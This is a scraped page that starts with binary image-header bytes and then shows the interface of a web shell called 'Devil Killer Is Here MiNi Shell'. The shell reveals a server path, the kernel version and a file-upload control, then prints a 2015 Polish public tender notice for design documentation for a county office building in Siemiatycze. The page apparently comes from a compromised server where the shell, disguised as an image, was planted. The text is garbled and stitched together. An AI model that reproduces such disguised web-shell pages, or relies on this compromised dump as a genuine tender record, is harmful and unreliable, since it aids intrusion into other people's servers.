JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150424/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20150424/58219-N-2015.html

<p class="kh_header"><b>Siemiatycze: Opracowanie dokumentacji technicznej  na termomodernizację budynku administracyjnego Starostwa Powiatowego w Siemiatyczach wraz przebudowę istniejących instalacji i montażem kolektorów słonecznych.</b><br>
<b>Numer ogłoszenia: 58219 - 2015; data zamieszczenia: 24.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Siemiatycki , ul. Legionów Piłsudskiego 3, 17-300 Siemiatycze, woj. podlaskie, tel. 85 65 66 500, faks 85 65 66 501.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji technicznej  na termomodernizację budynku administracyjnego Starostwa Powiatowego w Siemiatyczach wraz przebudowę istniejących instalacji i montażem kolektorów słonecznych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest opracowanie dokumentacji technicznej  na:
- termomodernizację budynku administracyjnego;
- przebudowę istniejących instalacji;
- montażem kolektorów słonecznych;  
Przed opracowaniem dokumentacji technicznej wykonawca:
a)  przeprowadzi  inwentaryzację aktualnego stanu obiektu.
b) opracuje koncepcję.
Dokumentację należy opracować w sposób umożliwiający Zamawiającemu uzyskania pozwolenia na budowę.
Dane ogólne budynku:
Budynek główny zlokalizowany  w Siemiatyczach przy ul. Legionów Piłsudskiego 3, działka nr 1202/1
Przeznaczenie budynku: budynek administracyjno-biurowy użyteczności publicznej.
Rok budowy: około roku 1961
Wielkości charakterystyczne:  
- kubatura budynku - 14 835,75 m3
- powierzchnia użytkowa około -  4 530,00 m2  
- powierzchnia zabudowy około -  1 132,50m2  
- wysokość budynku około -  10,40 m
- liczba kondygnacji:
- podziemna - 1
- nadziemna - 3
1.1. Charakterystyka stanu projektowanego - po modernizacji:
Prace modernizacyjne:
- montaż windy dla niepełnosprawnych (dźwig)
- docieplenie ścian zewnętrznych (z wykonaniem izolacji termicznej i przeciwwilgociowej (pionowej ) ścian    przyziemia, z okopaniem ścian i wykonaniem nowej opaski z kostki betonowej wokół budynku);
- przebudowa i aranżacja sali konferencyjnej
- podłączenie do nowego źródła ciepła (pompa ciepła), modernizacja instalacji c.o.
- wymiana instalacji wod-kan. z  wymianą armatury i urządzeń sanitarnych i częściowa rozbudowa;
- przystosowanie łazienek dla osób niepełnosprawnych na każdej kondygnacji budynku;
- wykonanie instalacji solarnej z kolektorami słonecznymi;
- wymiana okien (pozostałych do wymiany) na nowe;
- montaż centrali wentylacyjnej z rekuperacją oraz wykonanie przewodów    instalacji wentylacji mechanicznej nawiewno-wywiewnej EFEKT EKOLOGICZNY
- wykonanie  drzwi wyjściowych zewnętrznych ( na parking ) od strony południowej
- dostosowanie wielkości (moc grzewcza) grzejników z wymianą grzejników,
- adaptacja pomieszczenia z przeznaczeniem na pokój socjalny z wyposażeniem dla pracowników ( pokój śniadań)
2. Zakres przedmiotu zamówienia
2.1.	WYKONANIE INWENTARYZACJI BUDOWLANEJ OBIEKTU.
Inwentaryzacja musi się rozpocząć co najmniej 3 dni po podpisaniu umowy.
Po 20 dniach od podpisania umowy Zamawiającemu musi być dostarczona wstępna inwentaryzacja obiektu.
Założenia:
- dokładność i szczegółowość inwentaryzacji (w niezbędnym zakresie) powinna być wystarczająca do    sporządzenia wszelkich późniejszych opracowań Wykonawcy, inwentaryzacja powinna zawierać    między innymi:
 - rzuty wszystkich kondygnacji (piwnica, parter, I piętro, II piętro);
- przekroje (liczba powinna być wystarczająca do sporządzenia wszelkich późniejszych opracowań
   Wykonawcy);
- rzut konstrukcji dachu;
- rzut połaci dachu;
- elewacje.
Dokumentacja inwentaryzacyjna budynku w formie papierowej powinna być czytelna (skala          min. 1:100),
Przed wydrukowaniem ostatecznym rysunków inwentaryzacyjnych Zamawiający zastrzega         sobie prawo do ustalenie  stopnia szczegółowości rysunków,
Inwentaryzacja w formie elektronicznej (dwg) musi zawierać wszystkie zakładane elementy (każdy z nich osobna warstwa),
Inwentaryzacja obiektu oprócz standardów, swoim zakresem powinna obejmować:
 -   punkty oświetleniowe;
- gniazda elektryczne, teleinformatyczne;
- skrzynki elektryczne i teleinformatyczne;
-  wentylacja, klimatyzatory;
- wielkość okien (współczynnik przenikania);
- wielkość kaloryferów (moc grzewcza);
- Widoczne trasy instalacji;
- Przekroje konstrukcji dachowej ;
- Inwentaryzację kominiarską przewodów (lokalizacja, drożność, miejsca podłączenia, przekroje).
Wykonawca musi na podstawie widocznych elementów instalacji oraz informacji dostarczonych przez Zamawiającego oszacować i przewidzieć trasy istniejących instalacji, w celu ewentualnego prawidłowego skalkulowania np. robót rozbiórkowych oraz ewentualnego wykorzystania części instalacji nadającej się do dalszej eksploatacji.
2.2.	EKSPERTYZA STANU TECHNICZNEGO BUDYNKU
Założenia:
Opracowanie ekspertyzy technicznej zgodnie z § 206 ust. 2 rozporządzenia  Ministra Infrastruktury w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie ( Dz.U.02.75.690 ) w niezbędnym zakresie
Opracowanie opinii technicznej stanu instalacji (główne piony) oraz stanu przyłączy, ich wytężeniu (stopniu wykorzystania i stopniu zużycia)
Opracowania te musza być wykonane nie później niż na dzień zakończenia opracowania projektu koncepcyjnego
2.3.	PROJEKT KONCEPCYJNY
Zasadniczym celem przeprowadzenia prac remontowych jest poprawa funkcjonalności obiektu oraz zbliżenie jakości technicznej do aktualnie obowiązującego standardu jakościowego i estetycznego budynku oraz obowiązujących przepisów. Wykonanie przedmiotowych prac pozwoli na efektywniejsze użytkowanie budynku, podniesie jego estetykę oraz zmniejszy koszty utrzymania.
Projekt koncepcyjny powinien zakładać termomodernizację obiektu oraz   przebudowę istniejących instalacji i montaż kolektorów słonecznych.
Projekt koncepcyjny powinien być sporządzony na podstawie wytycznych  określonych na wspólnych spotkaniach z osobami wyznaczonymi przez Zamawiającego (spotkania takie powinny odbywać się co najmniej 1 raz w tygodniu, przez okres opracowania koncepcji, osoby uczestniczące w spotkaniach muszą posiadać uprawnienia w niezbędnym i omawianym zakresie).
Termomodernizacji podlegać będzie w założeniu cały budynek (około 4 530,00 m2 powierzchni użytkowej) ale Zamawiający zastrzega sobie prawo do ograniczenia tej powierzchni  w przypadku dużych i nieuzasadnionych nakładów finansowych poniesionych na planowaną termomodernizację.
W czasie opracowania koncepcji należy opracować audyt energetyczny budynku w celu określenia optymalnych rozwiązań mających znacząco obniżyć zapotrzebowanie energetyczne budynku. Zamawiający proponuje uwzględnić następujące kierunki, min.
- przebudowa węzła ciepłowniczego;
- system instalacji c.o. dopasowany do danych stref funkcjonalnych;
- montaż kolektorów słonecznych, itp., rozwiązań;
- montaż wentylacji mechanicznej z funkcją odzysku ciepła;
- docieplenie ścian budynku (w części na zewnątrz, w części od środka);
- przebudowa budynku (roboty budowlane)
Wszystkie kroki muszą być uzgodnione z Konserwatorem Zabytków (obiekt wpisany jest do ewidencji) w wymaganym zakresie .
Wstępne opracowania koncepcji powinny być przygotowane  40  dni po podpisaniu umowy.
2.4.	PROJEKT BUDOWLANY I WYKONAWCZY
Opracowanie wielobranżowego projektu termomodernizacji i wykonawczego na podstawie koncepcji  zgodnie z Ustawą z dnia 7 lipca 1994 r. Prawo budowlane oraz rozporządzeniem Ministra Infrastruktury w spawie szczegółowego zakresu i formy projektu budowlanego, zawierający:
- ekspertyzę budowlaną;
- charakterystykę energetyczną budynku;
- uzgodnienia z gestorami sieci ( w zależności od potrzeb);
- uzgodnienia z Konserwatorem Zabytków;
- uzgodnienia ZUD  (jeśli wymagane);
- projekt technologiczny budynku;
- projekt architektoniczny;
- projekt konstrukcyjny;
- projekt instalacji wod-kan;
- projekt instalacji CO (wraz z węzłem i projektowanymi pompami ciepła );
- projekt instalacji wentylacyjnej ;
- projekt instalacji elektrycznej, odgromowej;
- projekt instalacji niskoprądowej ( w tym system SAP);
- projekt przyłączy (budowa, przebudowa, kolizje) energetyczne, wod.-kan., deszczowe);
- opracowanie mapy do celów projektowych (w razie wystąpienia potrzeby, w formie papierowej oraz dwg);
- inne opracowania projektowe niezbędne do uzyskania pozwolenia na budowę wynikające z zachowania formy projektu budowlanego określonej w rozporządzeniu Ministra Transportu Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012 w sprawie  szczegółowego zakresu i formy projektu budowlanego  oraz realizacji budowlanej i oddania budynku do użytkowania.
Projekty wykonawcze (dla każdej z branż) będą posiadały szczegółowe rozwiązania projektowo materiałowe z podaniem technologii wykonania w uzgodnieniu z Zamawiającym.
Ponadto należy uzyskać wszystkie inne uzgodnienia podmiotów zewnętrznych oraz ewentualne odstępstwa od obowiązujących warunków technicznych celem uzyskania decyzji o pozwoleniu na budowę.
Forma i standard wykończenia powinny uwzględniać sposób przeznaczenia obiektu. Użyte materiały wykończeniowe powinny się cechować dużą trwałością użytkową.
Wykonawca zobowiązuje się do przedstawieniu Zamawiającemu co najmniej dwóch rozwiązań dotyczących głównych materiałów, urządzeń użytych podczas przebudowy.
Bezwzględnie wymagane jest spełnienie wymagań bezpieczeństwa pożarowego, bezpieczeństwa użytkowania, odpowiednich warunków higienicznych i zdrowotnych oraz ochrony środowiska, ochrony przed hałasem i drganiami, oszczędności energii i odpowiedniej izolacyjności cieplnej przegród.
2.5.	KOSZTORYSY I SPECYFIKACJE TECHNICZNE
Kosztorys  inwestorski  należy sporządzić, zgodnie z rozporządzenia Ministra Infrastruktury z 18.05.2004 r. w sprawie metod i podstaw sporządzania kosztorysu inwestorskiego , obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowych,  (Dz.U. Nr 130, poz. 1389 z dnia 8.06.2004 r.) W przypadku braku ceny jednostkowej zgodnie do Rozporządzenia cenę jednostkową należy ustalić na podstawie kalkulacji indywidualnej. Kalkulacje dołączyć  do kosztorysu  inwestorskiego.
Przedmiary robót należy sporządzać w oparciu o projekty budowlano-wykonawcze, dane wynikające z ekspertyz technicznych i planu zagospodarowania terenu oraz specyfikacji technicznej wykonania i odbioru robót budowlanych, i zestawienia wyposażenia obiektów.
Przedmiary robót mają obejmować zestawienie planowanych robót  w kolejności technologicznej ich wykonania, obliczenie i podanie ilości ustalonych jednostek przedmiarowych, wskazanie podstaw do ustalenia szczegółowego opisu robót lub szczegółowy opis robót obejmujący wyszczególnienie i opis czynności wchodzących w zakres robót, sporządzone przed wykonaniem robót na podstawie dokumentacji projektowej i specyfikacji technicznej wykonania i odbioru robót.       
Specyfikacja techniczna warunków wykonania i odbioru robót: w oparciu o Rozporządzenia Ministra Infrastruktury z dnia 02.09.2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. Nr 202, poz. 2072). Opracowanie ma zawierać zbiory wymagań w zakresie sposobu wykonania robót budowlanych, obejmujące w szczególności wymagane właściwości materiałów, wymagania dotyczące sposobu wykonania i oceny prawidłowości wykonania poszczególnych robót oraz określenie zakresu prac, które powinny być ujęte w cenach poszczególnych pozycji przedmiaru.
Tworząc dokumentacje projektowo- kosztorysową, wykonawca - projektant  ma obowiązek opisać przedmiot zamówienia zgodnie z ustawą Prawo Zamówień Publicznych  art. 29 ust.1-3 i 31 ust.1.
2.6.	INNE OPRACOWANIA
- instrukcja bezpieczeństwa pożarowego zgodna z § Rozporządzeni Ministra Spraw wewnętrznych i Administracji z dnia 7 czerwca 2010 r.  w sprawie ochrony przeciwpożarowej budynków, innych obiektów budowlanych i terenów.
2.7. WYMAGANIA ZAMAWIAJĄCEGO W ZAKRESIE OPRACOWANIA DOKUMENTACJI
1. Wykonawca winien na bieżąco uwzględniać w opracowaniach projektowych zmiany w przepisach i zasadach wiedzy technicznej. Dokumentacja projektowa objęta zamówieniem powinna być zgodna   z przepisami i zasadami wiedzy technicznej obowiązującymi na dzień przekazania informacji.
2. Wszelkie prace projektowe lub czynności nie opisane powyżej a niezbędne do właściwego i kompletnego opracowania dokumentacji projektowej, uzyskania niezbędnych uzgodnień oraz decyzji, należy traktować jako  oczywiste i uwzględnić w kosztach i terminach przedmiotu zamówienia.
3. Zastosowane rozwiązania projektowe powinny być wyważone ekonomicznie, gwarantujące bezawaryjną eksploatację obiektu uwzględniające natężenie i sposób użytkowania.
4. Zamawiający dodatkowo informuje, iż posiada dokumentację w postaci nieaktualnych rzutów poszczególnych kondygnacji.
5.  Przedmiot zamówienia należy wykonać w oparciu o:
- wizję lokalną;
- uzgodnienia z Zamawiającym;
- obowiązujące przepisy w sprawie zakresu i formy dokumentacji projektowej i specyfikacji technicznej, przepisy Prawa budowlanego oraz polskie normy budowlane;
- obowiązujące przepisy w zakresie metod i podstaw wykonania kosztorysów inwestorskich.
3.	Opracowanie projektu powinno obejmować następujące elementy:
3.1. Inwentaryzacja
- wersja papierowa 4 egzemplarze
- wersja elektroniczna 1 płyta CD (*.pdf ) (*.dwg)
3.2. Ekspertyzy, opinie techniczne
- wersja papierowa 2 egzemplarze
- wersja elektroniczna 1 płyta CD (*.pdf), (*.dwg)
3.3. Koncepcja
- wersja papierowa 2 egzemplarze
- wersja elektroniczna 1 płyta CD (*.pdf, )(*.dwg)
3.4. Projekt budowlany
- wersja papierowa 6 egzemplarzy
- wersja elektroniczna 1 płyta CD (*.pdf, *.doc,  (*.dwg)
3.5. Projekt wykonawczy
-  wersja papierowa 6 egzemplarzy
- wersja elektroniczna 1 płyta CD (*. dwg,)
3.6. Kosztorys inwestorski, przedmiar robót,
- wersja papierowa 2 egzemplarze
- wersja elektroniczna 1 płyta CD (*.pdf, *), (*.dwg)
3.7.Specyfikacja techn. warunków wykonania i odbioru robót
- wersja papierowa 2 egzemplarze
- wersja elektroniczna 1 płyta CD (*.pdf,*.doc) (*.dwg)
3.8. Inne opracowania
- wersja papierowa 2 egzemplarze
- wersja elektroniczna 1 płyta CD (*.pdf, *.doc, ZKI i zestawienia pomieszczeń*.xls  (*.dwg) *)
4.  Oznaczenia plików/katalogów powinny umożliwić Zamawiającemu identyfikację bez potrzeby ich otwierania, (PO UPRZEDNIM UZGODNIENIU NAZW I ZAWARTOŚCI Z Zamawiającym).
5. Przed wyceną prac projektowych należy zapoznać się z obiektem, w celu uwzględnienia wszystkich niezbędnych uwarunkowań, związanych z rzetelnym wykonaniem dokumentacji projektowej.
6. Wykonawcy zainteresowani zapoznaniem się z miejscem wykonywania prac będących przedmiotem zamówienia proszeni są o zgłoszenie zamiaru obejrzenia budynku , tel. 85 65 66 512, w godz. 8-14. Termin ustalony zostanie na roboczo.
7.  Wymaga się by w ciągu  3 dni od dnia podpisania umowy odbyło się pierwsze spotkanie robocze  z Zamawiającym, do tego czasu Wykonawca ma obowiązek dokonania wizji lokalnej obiektu.
8. Na etapie opracowywania projektu wymagane są robocze konsultacje z Zamawiającym w celu akceptacji proponowanych przez Wykonawcę rozwiązań funkcjonalnych, standardów wykończenia, itp.
9. Uzupełnienie, poprawienie i modyfikacja dokumentacji według zaleceń jednostek uzgadniających.
10. W zakres przedmiotu zamówienia wchodzi również  dokonanie przez Wykonawcę wszelkich poprawek, uzupełnień, modyfikacji w dokumentacji, których wykonanie będzie niezbędne dla uzyskania pozytywnej oceny i przyjęcia dokumentacji przez instytucje dokonujące oceny i kwalifikacji, także w przypadku, gdy konieczność wprowadzenia poprawek, uzupełnień  i modyfikacji wystąpi po przyjęciu przez Zamawiającego przedmiotu zamówienia.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie tego warunku jeżeli wykonawca wykaże że  w okresie ostatnich 3 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał co najmniej 2 ( dwa) wielobranżowe projekty budowlano - wykonawcze przebudowy, budowy (architektura, konstrukcja, instalacje sanitarne, elektryczne i teletechniczne) obiektu o powierzchni użytkowej  co najmniej 3500 m2,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku w zakresie dysponowania osobami zdolnymi do wykonania zamówienia wykonawca winien wykazać że dysponuje lub będzie dysponował na czas realizacji zamówienia osobami zdolnymi wykonać zamówienie, tj.
- co najmniej jedną osobą posiadającą uprawnienia do projektowania w specjalności konstrukcyjnej;
- co najmniej jedną osobą posiadającą uprawnienia do projektowania w specjalności architektonicznej;
- co najmniej jedną osobą posiadającą uprawnienia do projektowania w specjalności elektrycznej;
- co najmniej jedną osobą posiadającą uprawnienia do projektowania w specjalności   sanitarnej  ;
- co najmniej jedną osobą posiadającą uprawnienia do projektowania w specjalności
  telekomunikacyjnej (instalacje niskoprądowe);
- co najmniej jedną osobą posiadającą uprawnienia do projektowania w specjalności wentylacji;

Zamawiający uzna warunek za spełniony, również gdy Wykonawca będzie dysponował co najmniej 1 lub więcej osobami posiadającymi wszystkie uprawnienia wymienione w tiretach 1 - 6.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Dokumenty, z których będzie wynikało, że oferta podpisana jest przez osoby uprawnione (np. aktualny odpis z właściwego rejestru, aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, aktualny statut spółki). Jeżeli uprawnienie do reprezentacji osoby podpisującej ofertę nie będzie wynikało z załączonego dokumentu należy dołączyć także pełnomocnictwo w oryginale lub w postaci kopii poświadczonej notarialnie.
2. pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, jeżeli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolności finansowej innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Dokument powinien być załączony w oryginale.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - skrócenie  terminu realizacji zamówienia - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający na podstawie art. 144 ust 1 ustawy przewiduje możliwość dokonania zmiany      umowy  w niżej  wymienionych przypadkach:
